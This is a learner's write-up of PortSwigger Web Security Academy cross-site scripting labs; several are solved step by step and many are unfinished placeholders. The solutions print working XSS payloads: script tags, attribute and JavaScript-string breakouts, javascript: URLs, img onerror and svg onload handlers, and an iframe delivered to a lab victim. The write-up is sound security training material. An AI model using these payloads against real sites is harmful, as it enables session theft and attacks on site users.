---
title: 'Cross-Site Scripting (XSS)'
subtitle: 'PortSwigger Web Security Academy Labs'
author: 'Dan Egner'
date: 'PDF generated: \today'

titlepage: true
toc: true
---




# Between HTML tags: Reflected XSS into HTML context with nothing encoded

<https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded>

Completed: 2022-12-07


## Summary

TKTK


## Objective

> This lab contains a simple reflected cross-site scripting vulnerability in the search functionality.
>
>> To solve the lab, perform a cross-site scripting attack that calls the `alert` function.


## Solution

1. Submit `qwerty` in the search bar and search for `qwerty` in the response. The response contains this user input:

    ```html
	<h1>
		0 search results for 'qwerty'
	</h1>
    ```

1. Submit the following in the search bar:

    ```html
	<script>alert()</script>
    ```

1. As a result, this new response contains:

	```html
    <h1>
		0 search results for '<script>
			alert(1)
		</script>
		'
	</h1>
    ```

    The page immediately executes the `alert()` payload.




# Between HTML tags: Stored XSS into HTML context with nothing encoded

<https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded>

Completed: 2022-12-07


## Summary

TKTK


## Objective

> This lab contains a stored cross-site scripting vulnerability in the comment functionality.
>
>> To solve this lab, submit a comment that calls the `alert` function when the blog post is viewed.


## Solution

1. Submit a test comment on a blog post. The response reveals that the "comment" and "name" fields are included in the response:

    ```html
	<section class="comment">
		<p>
			<img src="/resources/images/avatarDefault.svg" class="avatar">
			qwertyname | 08 December 2022
		</p>
		<p>
			qwertycomment
		</p>
		<p>
		</p>
	</section>
    ```

1. Submit a comment on a blog post containing the following:

    ```html
	<script>alert()</script>
    ```

1. The response now contains:

    ```html
	<section class="comment">
		<p>
			<img src="/resources/images/avatarDefault.svg" class="avatar">
			qwertyname | 08 December 2022
		</p>
		<p>
			<script>
				alert()
			</script>
		</p>
		<p>
		</p>
	</section>
    ```

1. Visit the blog page to trigger the XSS




# Between HTML tags: Reflected XSS into HTML context with most tags and attributes blocked

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-most-tags-and-attributes-blocked>

Completed: TKTK




# Between HTML tags: Reflected XSS into HTML context with all tags blocked except custom ones

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-all-standard-tags-blocked>

Completed: TKTK




# Between HTML tags: Reflected XSS with event handlers and href attributes blocked

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-event-handlers-and-href-attributes-blocked>

Completed: TKTK




# Between HTML tags: Reflected XSS with some SVG markup allowed

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-some-svg-markup-allowed>

Completed: TKTK




# In HTML tag attributes: Reflected XSS into attribute with angle brackets HTML-encoded

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-attribute-angle-brackets-html-encoded>

Completed: 2022-12-08


## Summary

TKTK


## Objective

> This lab contains a reflected cross-site scripting vulnerability in the search blog functionality where angle brackets are HTML-encoded.
>
>> To solve this lab, perform a cross-site scripting attack that injects an attribute and calls the `alert` function.


## Solution

1. Submit a random string to the blog search field.

    ```html
	<input type=text placeholder='Search the blog...' name=search value="qwerty">
    ```

	The response HTML-encodes angle brackets, so we cannot get XSS via `<script></script>` tags

1. Submit the following in the blog search field:

    ```
	"onmouseover="alert(1)
    ```

1. Now the response contains:

    ```html
    <input type=text placeholder='Search the blog...' name=search value=""
	onmouseover="alert(1)">
    ```

1. Hover over the search bar to trigger the alert




# In HTML tag attributes: Stored XSS into anchor href attribute with double quotes HTML-encoded

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-href-attribute-double-quotes-html-encoded>

Completed: 2022-12-08


## Summary

TKTK


## Objective

> This lab contains a stored cross-site scripting vulnerability in the comment functionality.
>
>> To solve this lab, submit a comment that calls the `alert` function when the comment author name is clicked.


## Solution

1. Submit random strings into the various fields when submitting a comment on a blog post
1. Now try submitting special characters. This attribute is populated by the "Website" input field:

    ```
	<a id="author" href="http://<>&quot;'">
    ```

	The `href` attribute does not HTML-encode the angle brackets `< >`, but does encode double quotes `"`.
	The payload needs to run when we click the author name on the page.
 
1. Submit the following in the blog search field:

    ```
	javascript:alert(1)
    ```

1. This inserts the following into the page:

    ```
	<a id="author" href="javascript:alert(1)">
    ```

1. The JavaScript is executed when clicking on the comment author




# In HTML tag attributes: Reflected XSS in canonical link tag

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-canonical-link-tag>

Completed: TKTK




# Into JavaScript: Reflected XSS into a JavaScript string with single quote and backslash escaped

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-string-single-quote-backslash-escaped>

Completed: TKTK




# Into JavaScript: Reflected XSS into a JavaScript string with angle brackets HTML encoded

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-string-angle-brackets-html-encoded>

Completed: 2022-12-08


## Summary

TKTK


## Objective

> This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string.
>
>> To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the `alert` function.


## Solution

1. Submit the following in the blog search field:

    ```
	'-alert(1)-'
    ```

1. Web inspector shows that the page now contains the following:

    ```
	<h1>0 search results for ''-alert(1)-''</h1>
    ```

    The alert immediately appears.




# Into JavaScript: Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-string-angle-brackets-double-quotes-encoded-single-quotes-escaped>

Completed: TKTK




# Into JavaScript: Reflected XSS in a JavaScript URL with some characters blocked

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-url-some-characters-blocked>

Completed: TKTK




# Into JavaScript: Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-onclick-event-angle-brackets-double-quotes-html-encoded-single-quotes-backslash-escaped>

Completed: TKTK




# Into JavaScript: Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped

<https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-template-literal-angle-brackets-single-double-quotes-backslash-backticks-escaped>

Completed: TKTK




# Client-side template injection: Reflected XSS with AngularJS sandbox escape without strings

<https://portswigger.net/web-security/cross-site-scripting/contexts/client-side-template-injection/lab-angular-sandbox-escape-without-strings>

Completed: TKTK




# Client-side template injection: Reflected XSS with AngularJS sandbox escape and CSP

<https://portswigger.net/web-security/cross-site-scripting/contexts/client-side-template-injection/lab-angular-sandbox-escape-and-csp>

Completed: TKTK




# DOM XSS in document.write sink using source location.search

<https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink>

Completed: 2022-12-07


## Summary

TKTK


## Objective

> This lab contains a DOM-based cross-site scripting vulnerability in the search query tracking functionality. It uses the JavaScript `document.write` function, which writes data out to the page. The `document.write` function is called with data from `location.search`, which you can control using the website URL.
>
>> To solve this lab, perform a cross-site scripting attack that calls the `alert` function. 


## Solution

1. Submit a random string to the blog search field
1. Look through the repsonse to the search GET request. The `document.write` function writes this user input to the DOM within an `img src` attribute:

    ```html
	<script>
		function trackSearch(query) {
			document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
		}
		var query = (new URLSearchParams(window.location.search)).get('search');
		if(query) {
			trackSearch(query);
		}
	</script>
    ```

1. Submit the following in the blog search field:

    ```
	"><svg onload=alert(1)>
    ```

1. As a result, the following can be found in the `img` attribute (use browser inspector to view):

    ```
	<script>
		function trackSearch(query) {
			document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
		}
		var query = (new URLSearchParams(window.location.search)).get('search');
		if(query) {
			trackSearch(query);
		}
	</script>
	
	<img src="/resources/images/tracker.gif?searchTerms=">
	<svg onload="alert(1)">
		">
		<section class="blog-list">
		</section>
	</svg>
    ```

    The crafted input has broken out of the `img` attribute and placed the `alert()` function in the DOM.




# DOM XSS in document.write sink using source location.search inside a select element

<https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink-inside-select-element>

Completed: 2022-12-15


## Summary

TKTK


## Objective

> This lab contains a DOM-based cross-site scripting vulnerability in the stock checker functionality. It uses the JavaScript `document.write` function, which writes data out to the page. The `document.write` function is called with data from `location.search` which you can control using the website URL. The data is enclosed within a select element.
>
>> To solve this lab, perform a cross-site scripting attack that breaks out of the select element and calls the `alert` function.


## Solution

1. Use Burp Invader
1. Navigate to `/product?productId=1`
1. Use the stock checker button to check stock in any location
1. View the POST request. The body contains two parameters: `productId` (which is also a URL parameter on `/product`) and `storeId`
1. Append the storeId parameter to the URL and navigate there: `/product?productId=1&storeId=London` - it works!
1. Inject canary into the new `storeId` URL parameter
1. Invader finds a sink in `document.write`. Viewing page source shows it is within the following code:

    ```html
	var store = (new URLSearchParams(window.location.search)).get('storeId');
	document.write('<select name="storeId">');
	if(store) {
		document.write('<option selected>'+store+'</option>');
	}
    ```

1. Break out of the `<option>...</option>` tags and trigger XSS by submitting the following URL:

    ```
	/product?productId=1&storeId=blah</option><script>alert()</script>
    ```




# DOM XSS in innerHTML sink using source location.search

<https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sink>

Completed: 2022-12-08


## Summary

TKTK


## Objective

> This lab contains a DOM-based cross-site scripting vulnerability in the search blog functionality. It uses an `innerHTML` assignment, which changes the HTML contents of a `div` element, using data from `location.search`.
>
>> To solve this lab, perform a cross-site scripting attack that calls the `alert` function.


## Solution

1. Submit the following into the search box:

    ```
	<img src=1 onerror=alert(1)>
    ```

    The value of the `src` attribute is invalid and throws an error. This triggers the `onerror` event handler, which then calls the `alert()` function. As a result, the payload is executed whenever the user's browser attempts to load the page containing your malicious post.




# DOM XSS in jQuery anchor href attribute sink using location.search source

<https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-href-attribute-sink>

Completed: 2022-12-09


## Summary

TKTK


## Objective

> This lab contains a DOM-based cross-site scripting vulnerability in the submit feedback page. It uses the jQuery library's `$` selector function to find an anchor element, and changes its `href` attribute using data from `location.search`.
>
>> To solve this lab, make the "back" link alert `document.cookie`. 


## Solution

1. Use DOM Invader in Burp's browser, submit canary into all form fields and all page URL parameters
1. When submitting the canary to the `/feedback?returnPath=` URL parameter, Invader finds two sinks of interest: `jQuery.attr.href` and `element.setAttribute.href`
1. Enter the following value for the `returnPath` URL parameter and send:

    ```
	/feedback?returnPath=javascript:alert(document.cookie)
    ```




# DOM XSS in jQuery selector sink using a hashchange event

<https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-selector-hash-change-event>

Completed: 2022-12-15


## Summary

TKTK


## Objective

> This lab contains a DOM-based cross-site scripting vulnerability on the home page. It uses jQuery's `$()` selector function to auto-scroll to a given post, whose title is passed via the `location.hash` property.
>
>> To solve the lab, deliver an exploit to the victim that calls the `print()` function in their browser.


## Solution

1. The home page contains the following vulnerable code:

    ```html
	<script>
		$(window).on('hashchange', function(){
			var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)) + ')');
			if (post) post.get(0).scrollIntoView();
		});
	</script>
    ```

1. Open the provided exploit server
1. Set the "Body" to the following:

    ```
	<iframe src="https://0a4800cf045ef849c063599300e20019.web-security-academy.net#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
    ```

1. Click "Deliver to victim"

    Our malicious iframe is loaded in the victim's browser, causing it to execute the `print()` command.




# DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded

<https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression>

Completed: TKTK




# Reflected DOM XSS

<https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-dom-xss-reflected>

Completed: TKTK




# Stored DOM XSS

<https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-dom-xss-stored>

Completed: TKTK




# Exploiting cross-site scripting to steal cookies

<https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies>

Completed: TKTK




# Exploiting cross-site scripting to capture passwords

<https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-capturing-passwords>

Completed: TKTK




# Exploiting XSS to perform CSRF

<https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf>

Completed: TKTK




# Content Security Policy: Reflected XSS protected by very strict CSP, with dangling markup attack

<https://portswigger.net/web-security/cross-site-scripting/content-security-policy/lab-very-strict-csp-with-dangling-markup-attack>

Completed: TKTK




# Content Security Policy: Reflected XSS protected by CSP, with CSP bypass

<https://portswigger.net/web-security/cross-site-scripting/content-security-policy/lab-csp-bypass>

Completed: TKTK

